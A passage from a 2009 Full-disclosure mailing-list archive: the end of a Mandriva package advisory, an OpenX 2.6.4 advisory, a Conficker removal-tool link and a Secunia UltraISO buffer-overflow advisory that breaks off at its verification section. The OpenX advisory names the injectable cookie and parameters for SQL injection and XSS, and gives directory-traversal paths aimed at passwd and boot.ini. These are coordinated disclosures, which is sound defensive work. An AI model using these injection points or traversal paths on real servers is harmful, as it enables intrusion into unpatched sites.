 aafb381bffacbb57d7619e691dcf48fc  2009.0/i586/firefox-nb_NO-3.0.8-0.1mdv2009.0.i586.rpm
 094c4edf9f0d7c4b0a1a9bae06cd5305  2009.0/i586/firefox-nl-3.0.8-0.1mdv2009.0.i586.rpm
 389379f26795941d82e5985745d7fa37  2009.0/i586/firefox-nn_NO-3.0.8-0.1mdv2009.0.i586.rpm
 bc43aca5e4cda5a7110229b4546a14fe  2009.0/i586/firefox-oc-3.0.8-0.1mdv2009.0.i586.rpm
 87a48ad2839c3bebebdb7d4727fd0adf  2009.0/i586/firefox-pa_IN-3.0.8-0.1mdv2009.0.i586.rpm
 d6c98e22b5cec1fa73ec190aefc4c1ec  2009.0/i586/firefox-pl-3.0.8-0.1mdv2009.0.i586.rpm
 baa9a425c9dd086d53181dfd5f065a34  2009.0/i586/firefox-pt_BR-3.0.8-0.1mdv2009.0.i586.rpm
 f5a3bf224be7c8b26c65ac9324dd7119  2009.0/i586/firefox-pt_PT-3.0.8-0.1mdv2009.0.i586.rpm
 37b1592effc4460440f2ca345606061b  2009.0/i586/firefox-ro-3.0.8-0.1mdv2009.0.i586.rpm
 4ad9eda912e4cd12c72a21f3ccec5821  2009.0/i586/firefox-ru-3.0.8-0.1mdv2009.0.i586.rpm
 610660608c0ad020ad1e70887ed0d41d  2009.0/i586/firefox-si-3.0.8-0.1mdv2009.0.i586.rpm
 ed5d2e3a13455c6a9e1f0905a7343418  2009.0/i586/firefox-sk-3.0.8-0.1mdv2009.0.i586.rpm
 1500ca2f35fc02edb1bf0b180da692da  2009.0/i586/firefox-sl-3.0.8-0.1mdv2009.0.i586.rpm
 3236f61ba8935cc9dbf7e454bad50b62  2009.0/i586/firefox-sq-3.0.8-0.1mdv2009.0.i586.rpm
 271ab94e5ab608b6fd1e5e5d588c6c8f  2009.0/i586/firefox-sr-3.0.8-0.1mdv2009.0.i586.rpm
 f6a91ec2feb24ca6e22352b1c33f3bc3  2009.0/i586/firefox-sv_SE-3.0.8-0.1mdv2009.0.i586.rpm
 b52a78cee2476a996655d16766653b76  2009.0/i586/firefox-te-3.0.8-0.1mdv2009.0.i586.rpm
 78c823e0e9c9fc09daccc3997d00762d  2009.0/i586/firefox-th-3.0.8-0.1mdv2009.0.i586.rpm
 eeb04e5dd0f283dea7d005ea09305b04  2009.0/i586/firefox-theme-kde4ff-0.14-4.5mdv2009.0.i586.rpm
 183acea2aae60d1ea94babd445fd58f0  2009.0/i586/firefox-tr-3.0.8-0.1mdv2009.0.i586.rpm
 6842bb1692216263b1ce109314f6a092  2009.0/i586/firefox-uk-3.0.8-0.1mdv2009.0.i586.rpm
 50370c25ada3e8cd810bfc7ebec1dd55  2009.0/i586/firefox-zh_CN-3.0.8-0.1mdv2009.0.i586.rpm
 61b482cce7c6c680f3a3ea4e34d81438  2009.0/i586/firefox-zh_TW-3.0.8-0.1mdv2009.0.i586.rpm
 6bddf228e49662d9cca3a383b602196b  2009.0/i586/gnome-python-extras-2.19.1-20.5mdv2009.0.i586.rpm
 f9fae265205f3aa3027184a0ba0d0788  2009.0/i586/gnome-python-gda-2.19.1-20.5mdv2009.0.i586.rpm
 444080a803366542a4286e09eb3894f6  2009.0/i586/gnome-python-gda-devel-2.19.1-20.5mdv2009.0.i586.rpm
 52947c6a62dea4d5d9f1e44881f3f240  2009.0/i586/gnome-python-gdl-2.19.1-20.5mdv2009.0.i586.rpm
 382880849fbd2c96a62f1f67a539298b  2009.0/i586/gnome-python-gtkhtml2-2.19.1-20.5mdv2009.0.i586.rpm
 6e47db4e5cfc1e35a42647ed195b69af  2009.0/i586/gnome-python-gtkmozembed-2.19.1-20.5mdv2009.0.i586.rpm
 5ddd96130a783f740438dc00442a43e3  2009.0/i586/gnome-python-gtkspell-2.19.1-20.5mdv2009.0.i586.rpm
 5dcc1ebd2f01a9c68012839fbfe9fcdd  2009.0/i586/libdevhelp-1_0-0.21-3.5mdv2009.0.i586.rpm
 287dfa67049dca561cdce1c39db56b80  2009.0/i586/libdevhelp-1-devel-0.21-3.5mdv2009.0.i586.rpm
 f752610f5c6b3de082c56d4658ca7c2f  2009.0/i586/libxulrunner1.9-1.9.0.8-0.1mdv2009.0.i586.rpm
 4cc297d3ec254217c3c81cc577295418  2009.0/i586/libxulrunner-devel-1.9.0.8-0.1mdv2009.0.i586.rpm
 a0e415b9d8bc312fb99043c298dfe547  2009.0/i586/libxulrunner-unstable-devel-1.9.0.8-0.1mdv2009.0.i586.rpm
 c70dc520d3e9cee30fcc034416adddc3  2009.0/i586/mozilla-firefox-ext-blogrovr-1.1.779-5.5mdv2009.0.i586.rpm
 a2f210a380f08bfed912aac35c32afda  2009.0/i586/mozilla-firefox-ext-foxmarks-2.1.0.12-2.5mdv2009.0.i586.rpm
 10872ca1a6b25e65adfc02c7425154e6  2009.0/i586/mozilla-firefox-ext-scribefire-2.3.1-2.5mdv2009.0.i586.rpm
 5dbbdd1947c91fe5fce50ee6abb66440  2009.0/i586/mozilla-thunderbird-beagle-0.3.8-13.9mdv2009.0.i586.rpm
 5d790a8ef1de8988b018d42023203901  2009.0/i586/xulrunner-1.9.0.8-0.1mdv2009.0.i586.rpm
 a34760607dd9522936159095f3ae9305  2009.0/i586/yelp-2.24.0-3.5mdv2009.0.i586.rpm 
 0af232e8b82a0d5d422cd217a3095c15  2009.0/SRPMS/beagle-0.3.8-13.9mdv2009.0.src.rpm
 ec08538d565b4c93d1411d5b459f6bda  2009.0/SRPMS/devhelp-0.21-3.5mdv2009.0.src.rpm
 4a8b487c8e9923df501a58e647e7f496  2009.0/SRPMS/epiphany-2.24.0.1-3.7mdv2009.0.src.rpm
 1a7bfbc0d4b47f692f8c1b1efabce987  2009.0/SRPMS/firefox-3.0.8-0.1mdv2009.0.src.rpm
 aee1ce9b1c3d1fe93236ff67ad134ebc  2009.0/SRPMS/firefox-ext-mozvoikko-0.9.5-4.5mdv2009.0.src.rpm
 e17651ff892df9fb511930592623f6d0  2009.0/SRPMS/firefox-l10n-3.0.8-0.1mdv2009.0.src.rpm
 b14106036abb335b4782e221905a0a60  2009.0/SRPMS/firefox-theme-kde4ff-0.14-4.5mdv2009.0.src.rpm
 f79502ef6610068c0cdb7c1915d4d738  2009.0/SRPMS/gnome-python-extras-2.19.1-20.5mdv2009.0.src.rpm
 690379e70349835ba86af6fd9c22c94d  2009.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-5.5mdv2009.0.src.rpm
 92e0b34d1fb9027368dce4ed43ddb473  2009.0/SRPMS/mozilla-firefox-ext-foxmarks-2.1.0.12-2.5mdv2009.0.src.rpm
 3352e44dd58cfbfd01519ac91d3ab715  2009.0/SRPMS/mozilla-firefox-ext-scribefire-2.3.1-2.5mdv2009.0.src.rpm
 50d7147904f1047226aa77959717a88b  2009.0/SRPMS/xulrunner-1.9.0.8-0.1mdv2009.0.src.rpm
 5f937b04bca0c44ab008be3073f1cc85  2009.0/SRPMS/yelp-2.24.0-3.5mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 93f037f5da696582b0a8b448dd6e7126  2009.0/x86_64/beagle-0.3.8-13.9mdv2009.0.x86_64.rpm
 c62bb72f3b580d50549b1f5ba05be01e  2009.0/x86_64/beagle-crawl-system-0.3.8-13.9mdv2009.0.x86_64.rpm
 f48945549ca66cfd3355bd2fae0a1311  2009.0/x86_64/beagle-doc-0.3.8-13.9mdv2009.0.x86_64.rpm
 627737d1245ad243a1409f66f2e82637  2009.0/x86_64/beagle-epiphany-0.3.8-13.9mdv2009.0.x86_64.rpm
 707aade14a7fb58aed2799f5afbdfb9c  2009.0/x86_64/beagle-evolution-0.3.8-13.9mdv2009.0.x86_64.rpm
 b2be46b456a9eb322466737c99ffb62e  2009.0/x86_64/beagle-gui-0.3.8-13.9mdv2009.0.x86_64.rpm
 9697289454b15bac24748c440bf990da  2009.0/x86_64/beagle-gui-qt-0.3.8-13.9mdv2009.0.x86_64.rpm
 a73339b2c171acb776a6178db0421ed2  2009.0/x86_64/beagle-libs-0.3.8-13.9mdv2009.0.x86_64.rpm
 bbeab59cdd34d61823d4093bd540c5f0  2009.0/x86_64/devhelp-0.21-3.5mdv2009.0.x86_64.rpm
 14bb3c30596e381b1692dd364b610f8a  2009.0/x86_64/devhelp-plugins-0.21-3.5mdv2009.0.x86_64.rpm
 ab29bfea5991ca4085117e4a3e8ee36d  2009.0/x86_64/epiphany-2.24.0.1-3.7mdv2009.0.x86_64.rpm
 362feebbb5f851f321c07fa986da4231  2009.0/x86_64/epiphany-devel-2.24.0.1-3.7mdv2009.0.x86_64.rpm
 00d8fd823e141089ccfc8818804ff348  2009.0/x86_64/firefox-3.0.8-0.1mdv2009.0.x86_64.rpm
 a00ddcda2a55676048cf577e38f69f58  2009.0/x86_64/firefox-af-3.0.8-0.1mdv2009.0.x86_64.rpm
 8c662472eaa1ff990c2f30eeb16d55cd  2009.0/x86_64/firefox-ar-3.0.8-0.1mdv2009.0.x86_64.rpm
 0f0b97c9cf9c28b4d9e36701348b60d1  2009.0/x86_64/firefox-be-3.0.8-0.1mdv2009.0.x86_64.rpm
 13702dda359ea32021d2a81f76e9251a  2009.0/x86_64/firefox-bg-3.0.8-0.1mdv2009.0.x86_64.rpm
 2c73db5dad4a4777b3276ed9e2e5c732  2009.0/x86_64/firefox-bn-3.0.8-0.1mdv2009.0.x86_64.rpm
 c5af2855e4ff4ff6e44da212c8de6140  2009.0/x86_64/firefox-ca-3.0.8-0.1mdv2009.0.x86_64.rpm
 3bd834626dc9b8140217d2a45fb8d37c  2009.0/x86_64/firefox-cs-3.0.8-0.1mdv2009.0.x86_64.rpm
 5f0004fc440bb3b523dfd1f9327fa00e  2009.0/x86_64/firefox-cy-3.0.8-0.1mdv2009.0.x86_64.rpm
 1a3181565987321293afee5344d06a1c  2009.0/x86_64/firefox-da-3.0.8-0.1mdv2009.0.x86_64.rpm
 79542c60ebef546c3be4f132f63b4c91  2009.0/x86_64/firefox-de-3.0.8-0.1mdv2009.0.x86_64.rpm
 e28eca0f73ebb4867b47d8ffc85299cb  2009.0/x86_64/firefox-el-3.0.8-0.1mdv2009.0.x86_64.rpm
 537d630ded4d6c4831e06ce9845bad31  2009.0/x86_64/firefox-en_GB-3.0.8-0.1mdv2009.0.x86_64.rpm
 fb8ffa4dc90f0edefd3d381d19370f7b  2009.0/x86_64/firefox-eo-3.0.8-0.1mdv2009.0.x86_64.rpm
 0a6646a0d8d39908739226ab3a368e32  2009.0/x86_64/firefox-es_AR-3.0.8-0.1mdv2009.0.x86_64.rpm
 622e965b7ab3a2463291485182d0758d  2009.0/x86_64/firefox-es_ES-3.0.8-0.1mdv2009.0.x86_64.rpm
 4b8e7845e4c5a3933559fbd1a4d3a983  2009.0/x86_64/firefox-et-3.0.8-0.1mdv2009.0.x86_64.rpm
 6ace872735c301ca918d25c547813218  2009.0/x86_64/firefox-eu-3.0.8-0.1mdv2009.0.x86_64.rpm
 f7cdd230e6dade3422ac3eadcd28b0db  2009.0/x86_64/firefox-ext-beagle-0.3.8-13.9mdv2009.0.x86_64.rpm
 5591ec116db070cf274461088909a788  2009.0/x86_64/firefox-ext-mozvoikko-0.9.5-4.5mdv2009.0.x86_64.rpm
 d49c290e711e33f097684e32fd7333ce  2009.0/x86_64/firefox-fi-3.0.8-0.1mdv2009.0.x86_64.rpm
 a51341fa88c9db9b68e149512278cfed  2009.0/x86_64/firefox-fr-3.0.8-0.1mdv2009.0.x86_64.rpm
 c685578e8667beea7a3bc891dc30fe49  2009.0/x86_64/firefox-fy-3.0.8-0.1mdv2009.0.x86_64.rpm
 fc018d3d97b835241f776d3838086192  2009.0/x86_64/firefox-ga_IE-3.0.8-0.1mdv2009.0.x86_64.rpm
 a3fd7f1549293e8aef4f01961e269cb1  2009.0/x86_64/firefox-gl-3.0.8-0.1mdv2009.0.x86_64.rpm
 8f111c82ddf041219d94f2f22ef72bcb  2009.0/x86_64/firefox-gu_IN-3.0.8-0.1mdv2009.0.x86_64.rpm
 51002832c905cead5511ec2216768ea9  2009.0/x86_64/firefox-he-3.0.8-0.1mdv2009.0.x86_64.rpm
 50416fdfbfbabe028712e07875d561ad  2009.0/x86_64/firefox-hi-3.0.8-0.1mdv2009.0.x86_64.rpm
 5aec201752d44ed9e1b42d5bb6f1b458  2009.0/x86_64/firefox-hu-3.0.8-0.1mdv2009.0.x86_64.rpm
 37e16832bef2a236b9c5c7d9f1bb65ce  2009.0/x86_64/firefox-id-3.0.8-0.1mdv2009.0.x86_64.rpm
 1b3ca71d656c1be20f6ecfc51571e199  2009.0/x86_64/firefox-is-3.0.8-0.1mdv2009.0.x86_64.rpm
 eeb11a84a3f8875ccfc4a5f8568c4098  2009.0/x86_64/firefox-it-3.0.8-0.1mdv2009.0.x86_64.rpm
 499168a96034caaa4e2bd09821be473c  2009.0/x86_64/firefox-ja-3.0.8-0.1mdv2009.0.x86_64.rpm
 fb35f04838c41a2f32fa0a8ea24a9cdb  2009.0/x86_64/firefox-ka-3.0.8-0.1mdv2009.0.x86_64.rpm
 81bf372991a49fd919fcac2efa405033  2009.0/x86_64/firefox-kn-3.0.8-0.1mdv2009.0.x86_64.rpm
 d0e132d08efabf9a7e3d39d5b7edac91  2009.0/x86_64/firefox-ko-3.0.8-0.1mdv2009.0.x86_64.rpm
 b18f191b76dac80af4503bdd85420493  2009.0/x86_64/firefox-ku-3.0.8-0.1mdv2009.0.x86_64.rpm
 c3abf9d5e201392e63d841db8a5668dd  2009.0/x86_64/firefox-lt-3.0.8-0.1mdv2009.0.x86_64.rpm
 561689aac7e05ce0f247a8e820e26184  2009.0/x86_64/firefox-lv-3.0.8-0.1mdv2009.0.x86_64.rpm
 d73bbb4ad043a9e8f0b4f34579a6d7c3  2009.0/x86_64/firefox-mk-3.0.8-0.1mdv2009.0.x86_64.rpm
 6f78452de7072c8cda78f9da0142680e  2009.0/x86_64/firefox-mn-3.0.8-0.1mdv2009.0.x86_64.rpm
 1a19c4e32e5d710b444f9e304bd45662  2009.0/x86_64/firefox-mr-3.0.8-0.1mdv2009.0.x86_64.rpm
 2105b6937921bad809ec0ab1297db0a8  2009.0/x86_64/firefox-nb_NO-3.0.8-0.1mdv2009.0.x86_64.rpm
 980e416fbd79869db4d0d421129518cf  2009.0/x86_64/firefox-nl-3.0.8-0.1mdv2009.0.x86_64.rpm
 48ecc48f78282f962ac234affe98719b  2009.0/x86_64/firefox-nn_NO-3.0.8-0.1mdv2009.0.x86_64.rpm
 0ea86980b1f07c6f55ccca43d0f36258  2009.0/x86_64/firefox-oc-3.0.8-0.1mdv2009.0.x86_64.rpm
 d1d0799b59a8967e55e8960c1a02a90e  2009.0/x86_64/firefox-pa_IN-3.0.8-0.1mdv2009.0.x86_64.rpm
 a14392c012fb280b02c2f7e507e656e2  2009.0/x86_64/firefox-pl-3.0.8-0.1mdv2009.0.x86_64.rpm
 8099da615e10f7773d5a79e41c166ad0  2009.0/x86_64/firefox-pt_BR-3.0.8-0.1mdv2009.0.x86_64.rpm
 76bb5fa262b718e75b7a85b3915664fd  2009.0/x86_64/firefox-pt_PT-3.0.8-0.1mdv2009.0.x86_64.rpm
 cd169e5ab7fe1735ae98169cc6af0c1f  2009.0/x86_64/firefox-ro-3.0.8-0.1mdv2009.0.x86_64.rpm
 3f050576f0b6c8f35c9238284567d593  2009.0/x86_64/firefox-ru-3.0.8-0.1mdv2009.0.x86_64.rpm
 6b478236c6f15617669849d6e4d0585f  2009.0/x86_64/firefox-si-3.0.8-0.1mdv2009.0.x86_64.rpm
 2e4be1be1b02e89bc158ae2d092f36bf  2009.0/x86_64/firefox-sk-3.0.8-0.1mdv2009.0.x86_64.rpm
 a070fe8d36c289a16ba48e3e147bd7ac  2009.0/x86_64/firefox-sl-3.0.8-0.1mdv2009.0.x86_64.rpm
 26d6cdf9cb753e646f39f740f3df9af9  2009.0/x86_64/firefox-sq-3.0.8-0.1mdv2009.0.x86_64.rpm
 f90deb525bedaae621f25e50d0e52a3f  2009.0/x86_64/firefox-sr-3.0.8-0.1mdv2009.0.x86_64.rpm
 c6dcf46ca61029fca478a31228141f6c  2009.0/x86_64/firefox-sv_SE-3.0.8-0.1mdv2009.0.x86_64.rpm
 976f9b1d2d3ee881b88902ec61758d5c  2009.0/x86_64/firefox-te-3.0.8-0.1mdv2009.0.x86_64.rpm
 be6db8b12f482ddef9770e979d42d83d  2009.0/x86_64/firefox-th-3.0.8-0.1mdv2009.0.x86_64.rpm
 5e15b7a1cd2b883d8623d5243a1daa80  2009.0/x86_64/firefox-theme-kde4ff-0.14-4.5mdv2009.0.x86_64.rpm
 f0bef30f57f14b0a7f66f55e062c4765  2009.0/x86_64/firefox-tr-3.0.8-0.1mdv2009.0.x86_64.rpm
 14533ad8ded9b5feace9725e4063cb0f  2009.0/x86_64/firefox-uk-3.0.8-0.1mdv2009.0.x86_64.rpm
 c43d7a9fa3566d4533694bc89ec54c5c  2009.0/x86_64/firefox-zh_CN-3.0.8-0.1mdv2009.0.x86_64.rpm
 d87c3beefe5a5ddb5c43b2e0591fe616  2009.0/x86_64/firefox-zh_TW-3.0.8-0.1mdv2009.0.x86_64.rpm
 c7a61c58932b340097844ca941ae0336  2009.0/x86_64/gnome-python-extras-2.19.1-20.5mdv2009.0.x86_64.rpm
 f9501d6d9204ecf1c0880ab973ae6421  2009.0/x86_64/gnome-python-gda-2.19.1-20.5mdv2009.0.x86_64.rpm
 09d01345acd34d23a795dacfc38979f9  2009.0/x86_64/gnome-python-gda-devel-2.19.1-20.5mdv2009.0.x86_64.rpm
 e8bded4b6a1baaa25bfc0df647705ece  2009.0/x86_64/gnome-python-gdl-2.19.1-20.5mdv2009.0.x86_64.rpm
 f31b33852952a8483e98706b9e96d5aa  2009.0/x86_64/gnome-python-gtkhtml2-2.19.1-20.5mdv2009.0.x86_64.rpm
 05834f856ca4dba4c18c51f93aaa87fc  2009.0/x86_64/gnome-python-gtkmozembed-2.19.1-20.5mdv2009.0.x86_64.rpm
 c06060633fc969b3573822b17a65cca6  2009.0/x86_64/gnome-python-gtkspell-2.19.1-20.5mdv2009.0.x86_64.rpm
 d8fcdc39a42649a61bb3c0cd1b183f78  2009.0/x86_64/lib64devhelp-1_0-0.21-3.5mdv2009.0.x86_64.rpm
 60c0c501521fe97b21e6d450335ac966  2009.0/x86_64/lib64devhelp-1-devel-0.21-3.5mdv2009.0.x86_64.rpm
 8c4444c680286d1f2b454427aaf8b2c3  2009.0/x86_64/lib64xulrunner1.9-1.9.0.8-0.1mdv2009.0.x86_64.rpm
 f719303b8a250ac941c816ad2e36f053  2009.0/x86_64/lib64xulrunner-devel-1.9.0.8-0.1mdv2009.0.x86_64.rpm
 fddbb395fa7c60fcf02dbf1558995824  2009.0/x86_64/lib64xulrunner-unstable-devel-1.9.0.8-0.1mdv2009.0.x86_64.rpm
 cfc57485ca157070a8865c622f26c373  2009.0/x86_64/mozilla-firefox-ext-blogrovr-1.1.779-5.5mdv2009.0.x86_64.rpm
 67a33ce664b9c344a6796aa4627401ca  2009.0/x86_64/mozilla-firefox-ext-foxmarks-2.1.0.12-2.5mdv2009.0.x86_64.rpm
 77af1f1347d2106fd81e527a252530fc  2009.0/x86_64/mozilla-firefox-ext-scribefire-2.3.1-2.5mdv2009.0.x86_64.rpm
 2ff2839723e4a23336a5af3984f120c3  2009.0/x86_64/mozilla-thunderbird-beagle-0.3.8-13.9mdv2009.0.x86_64.rpm
 150923571c07b1f17aad3448de8ae1a8  2009.0/x86_64/xulrunner-1.9.0.8-0.1mdv2009.0.x86_64.rpm
 2c7c4f38a6aebff61c878332283580c9  2009.0/x86_64/yelp-2.24.0-3.5mdv2009.0.x86_64.rpm 
 0af232e8b82a0d5d422cd217a3095c15  2009.0/SRPMS/beagle-0.3.8-13.9mdv2009.0.src.rpm
 ec08538d565b4c93d1411d5b459f6bda  2009.0/SRPMS/devhelp-0.21-3.5mdv2009.0.src.rpm
 4a8b487c8e9923df501a58e647e7f496  2009.0/SRPMS/epiphany-2.24.0.1-3.7mdv2009.0.src.rpm
 1a7bfbc0d4b47f692f8c1b1efabce987  2009.0/SRPMS/firefox-3.0.8-0.1mdv2009.0.src.rpm
 aee1ce9b1c3d1fe93236ff67ad134ebc  2009.0/SRPMS/firefox-ext-mozvoikko-0.9.5-4.5mdv2009.0.src.rpm
 e17651ff892df9fb511930592623f6d0  2009.0/SRPMS/firefox-l10n-3.0.8-0.1mdv2009.0.src.rpm
 b14106036abb335b4782e221905a0a60  2009.0/SRPMS/firefox-theme-kde4ff-0.14-4.5mdv2009.0.src.rpm
 f79502ef6610068c0cdb7c1915d4d738  2009.0/SRPMS/gnome-python-extras-2.19.1-20.5mdv2009.0.src.rpm
 690379e70349835ba86af6fd9c22c94d  2009.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-5.5mdv2009.0.src.rpm
 92e0b34d1fb9027368dce4ed43ddb473  2009.0/SRPMS/mozilla-firefox-ext-foxmarks-2.1.0.12-2.5mdv2009.0.src.rpm
 3352e44dd58cfbfd01519ac91d3ab715  2009.0/SRPMS/mozilla-firefox-ext-scribefire-2.3.1-2.5mdv2009.0.src.rpm
 50d7147904f1047226aa77959717a88b  2009.0/SRPMS/xulrunner-1.9.0.8-0.1mdv2009.0.src.rpm
 5f937b04bca0c44ab008be3073f1cc85  2009.0/SRPMS/yelp-2.24.0-3.5mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJ00I9mqjQ0CJFipgRAogoAKDt1CkUhJMbqF37UGGTGxbL47xxtwCaAwIx
WZlk4V0CRuJByR/qcxLVHe8=
=9M/K
-----END PGP SIGNATURE-----



From publists at enablesecurity.com  Wed Apr  1 21:35:06 2009
From: publists at enablesecurity.com (Sandro Gauci)
Date: Wed, 1 Apr 2009 22:35:06 +0200
Subject: [Full-disclosure] OpenX 2.6.4 multiple vulnerabilities
Message-ID: <69e56bb50904011335p40bb0eds5a762cce15b98407@mail.gmail.com>

__________________________________________________________________

   OpenX multiple vulnerabilities
__________________________________________________________________


An advisory by EnableSecurity in collaboration with Acunetix.

Advisory URL:
http://resources.enablesecurity.com/advisories/openx-2.6.4-multiple.txt

Version: OpenX 2.6.4 and older versions

Description:

OpenX is an online advertising web application written in PHP that
supports popular sites such as TechCrunch, SUN Microsystems and
Metacafe.

>From their website (openx.org):
"OpenX is a free, open source ad server that manages the selling and
delivery of your online advertising inventory. You can get OpenX as a
hosted service or as downloaded software."

Credits:

These vulnerabilities were discovered during testing of AcuSensor
Technology feature in Acunetix WVS.
We worked with the OpenX security team to have these security flaws
reported and fixed.
We would like to publicly thank the OpenX team for their prompt response!

__________________________________________________________________

Technical details:

The following vulnerabilities were identified:

Major issues:
  - SQL injection
  - Cross Site Scripting

Other issues:
  - Arbitrary File Deletion
  - CRLF injection



----------- Major issues -----------

::::: SQL vulnerabilities :::::

[[ Trigger: /adview.php ]]

Description:
The cookie "OAID" is not filtered when adview.php is accessed and used
directly to construct the SQL INSERT statement.

[[ Trigger: /www/delivery/tjs.php ]]

Description:
1. The cookie "OAID" is not filtered when adview.php is accessed and
used directly to construct the SQL INSERT statement.
2. The "referer" parameter in the GET request is also used in the SQL
statement and is another vector.



::::: XSS Vulnerabilities :::::

[[ Trigger: /www/admin/sso-accounts.php ]]

Description:
The "email" parameter in the POST data is simply printed out in the
html page, allowing injection of HTML i.e. XSS attacks.

----------- Possible issues -----------


::::: Arbitary file deletion :::::

[[ Trigger: /www/delivery/tjs.php ]]

Reason:
May not be easily exploitable but it does allow directories to be
traversed when deleting cache files.

Exploitation:
It does not seem to be exploitable on Linux, but might be exploitable
on Windows. On Linux the following path would not open:
/etc/../asdf/../passwd because "asdf" does not exist. However the
following works on Windows: C:\asdf\..\boot.ini, even if "asdf" does
not exist.


::::: CRLF Injection :::::

Reason:
It seems that the current version of PHP does not allow headers with
multiple lines, i.e ones that contain the carraige and return line
feed characters. Therefore OpenX does not appear to be exploitable.
However, the code does allow CRLF injection and this may be exposed in
some other way *(eg. old versions of PHP ?).

[[ Trigger: /adframe.php ]]

[[ Trigger: /adjs.php ]]

[[ Trigger: /www/delivery/tjs.php ]]


__________________________________________________________________

Demonstration:
http://www.youtube.com/watch?v=kiNeiMS2Iu0

Exploit code:
Available to organizations by contacting info at enablesecurity.com

Timeline:

Feb 03, 2009: An email was sent to the security team at OpenX and PGP
keys exchanged
Feb 03, 2009: Sent report to OpenX team with full details
Feb 04, 2009: A patch was provided to us and we verified that the
patch fixes the reported issues
Apr 01, 2009: Co-ordinated information release

Solution:

Upgrade to the latest version of OpenX:
http://www.openx.org/ad-server/download

__________________________________________________________________

About EnableSecurity:

EnableSecurity is dedicated to providing high quality Information
Security Consultancy, Research and Development. EnableSecurity
develops security tools such as VOIPPACK (for Immunity CANVAS) and
SIPVicious. EnableSecurity is focused on analysis of security
challenges and providing solutions to such threats. EnableSecurity
works on developing custom targeted security solutions, as well as
working with existing off the shelf security tools to provide the best
results for their customers. More info at enablesecurity.com

About Acunetix:
Acunetix Web Vulnerability Scanner is a tool designed to discover
security holes in web applications that attackers could abuse to gain
access to a business' systems and data. With Acunetix WVS websites can
be regularly checked for vulnerabilities such as SQL injection and
Cross Site Scripting. The scanner ships with many innovative features
such as: AcuSensor Technology, automatic JavaScript analyzer, Visual
macro recorders and extensive reporting facilities, which include
various compliance reports.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information.
Use of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use of,
or reliance on, this information.



From ntpeck at yahoo.com  Wed Apr  1 00:59:55 2009
From: ntpeck at yahoo.com (v3nd3rs5uck)
Date: Tue, 31 Mar 2009 16:59:55 -0700 (PDT)
Subject: [Full-disclosure] Conficker tool for end users
Message-ID: <165303.18966.qm@web30101.mail.mud.yahoo.com>


Hi Folks,
Since Conficker is a big thing these days I thought I'd send a link to a removal tool.

http://www.mcafee.com/us/threat_center/conficker.html


      



From remove-vuln at secunia.com  Wed Apr  1 09:38:06 2009
From: remove-vuln at secunia.com (Secunia Research)
Date: Wed, 1 Apr 2009 10:38:06 +0200
Subject: [Full-disclosure] Secunia Research: UltraISO Image Parsing Buffer
	Overflow Vulnerabilities
Message-ID: <200904010838.n318c6pp001235@ca.secunia.com>

====================================================================== 

                     Secunia Research 01/04/2009

    - UltraISO Image Parsing Buffer Overflow Vulnerabilities -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* UltraISO 9.3.1.2633

NOTE: Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately critical
Impact: System compromise
Where:  Remote

====================================================================== 
3) Vendor's Description of Software 

"UltraISO is a powerful and easy-to-use utility that can extract,
create, edit, and convert CD/DVD image files. It can directly edit ISO
files, make images from CD/DVD-ROMs, or create new one from files and
folders on your computer.".

Product Link:
http://www.ezbsystems.com/ultraiso/index.html

====================================================================== 
4) Description of Vulnerability

Secunia Research has discovered three vulnerabilities in UltraISO, 
which can be exploited by malicious people to compromise a user's 
system.

1) A boundary error when parsing CIF files can be exploited to 
overflow a global buffer by tricking a user into opening a specially 
crafted CIF file.

2) A boundary error when parsing C2D files can be exploited to 
overflow a global buffer by tricking a user into opening a specially 
crafted C2D file.

3) Insufficient validation when parsing GI files can be exploited to
overflow a global buffer by tricking a user into opening a specially 
crafted GI file.

Successful exploitation allows execution of arbitrary code.

====================================================================== 
5) Solution 

Update to 9.3.3.2685.

====================================================================== 
6) Time Table 

03/11/2008 - Vendor notified.
05/11/2008 - Vendor response with updated version.
06/11/2008 - Vendor informed that all but one vulnerabilities are 
             correctly fixed.
07/11/2008 - Vendor provides new version for testing.
07/11/2008 - Vendor informed that all vulnerabilities are now fixed.
31/03/2009 - Secunia notices that the latest version is not affected.
             Vendor contacted to receive confirmation that the
             reported vulnerabilities are fixed in released version.
31/03/2009 - Vendor confirms having fixed the vulnerabilities.
01/04/2009 - Public disclosure.

====================================================================== 
7) Credits 

Discovered by Dyon Balding, Secunia Research.

====================================================================== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-4825 for the vulnerabilities.

====================================================================== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

====================================================================== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
